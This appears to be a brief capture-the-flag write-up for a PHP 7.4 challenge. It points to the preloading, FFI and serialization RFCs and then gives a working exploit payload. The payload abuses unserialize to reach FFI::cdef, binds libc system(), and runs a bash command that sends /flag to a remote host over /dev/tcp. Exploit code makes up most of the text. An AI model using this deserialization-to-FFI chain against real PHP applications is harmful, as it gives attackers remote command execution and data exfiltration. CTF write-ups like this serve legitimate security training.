Rating: 5.0
Just read these 3 RFCs for PHP 7.4 and write your own payload:
- [PHP RFC: Preloading](https://wiki.php.net/rfc/preload)
- [PHP RFC: FFI - Foreign Function Interface](https://wiki.php.net/rfc/ffi)
- [PHP RFC: New custom object serialization mechanism](https://wiki.php.net/rfc/custom_object_serialization)
## Payload
```php
class D implements Serializable {
protected $data = [
'ret' => null,
'func' => 'FFI::cdef',
'arg' => 'int system(const char *command);'
];
public function serialize (): string {
return serialize($this->data);
}
public function unserialize($payload) {
$this->data = unserialize($payload);
}
}
$a = new D();
$b = serialize($a);
$b = str_replace('"D"', '"A"', $b);
$d = unserialize($b);
$d->ret->system('bash -c "cat /flag > /dev/tcp/xxx/xxx"');
```
